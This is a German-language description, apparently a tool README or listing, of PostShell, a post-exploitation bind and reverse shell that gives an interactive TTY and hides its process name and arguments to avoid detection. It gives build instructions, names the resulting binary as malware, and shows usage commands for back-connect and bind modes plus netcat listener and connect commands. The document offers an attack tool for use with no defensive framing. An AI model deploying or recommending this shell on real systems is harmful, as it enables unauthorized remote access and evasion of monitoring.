
PostShell - Post-Exploitation-Bind/Backconnect-Shell
PostShell ist eine Post-Exploitation-Shell, die sowohl eine Bind-Shell als auch eine Back-Connect-Shell umfasst. Sie erstellt ein vollständig interaktives TTY, das Job Control ermöglicht. Die Stub-Größe beträgt etwa 14 KB und kann auf jedem Unix-ähnlichen System kompiliert werden.
Banner und Interaktion mit der Shell nach dem Herstellen einer Verbindung.
PostShell erleichtert die Post-Exploitation, indem der Angreifer weniger auf Abhängigkeiten wie Python und Perl angewiesen ist. Es integriert sowohl eine Back-Connect- als auch eine Bind-Shell, sodass ein Operator, falls ein Ziel keine ausgehenden Verbindungen zulässt, einfach eine Bind-Shell starten und sich remote mit dem Rechner verbinden kann. PostShell ist zudem deutlich unauffälliger als eine traditionelle Shell, da sowohl der Prozessname als auch die Argumente verschleiert werden.
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
Dadurch sollte eine Binärdatei namens "stub" erstellt werden – dies ist die Malware.$ ./stub
Bind Shell Verwendung: ./stub port
Back Connect Verwendung: ./stub ip port
$
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Empfangen eines Backconnects:
$ nc -vlp port
Verbinden mit einer Bind Shell:
$ nc host port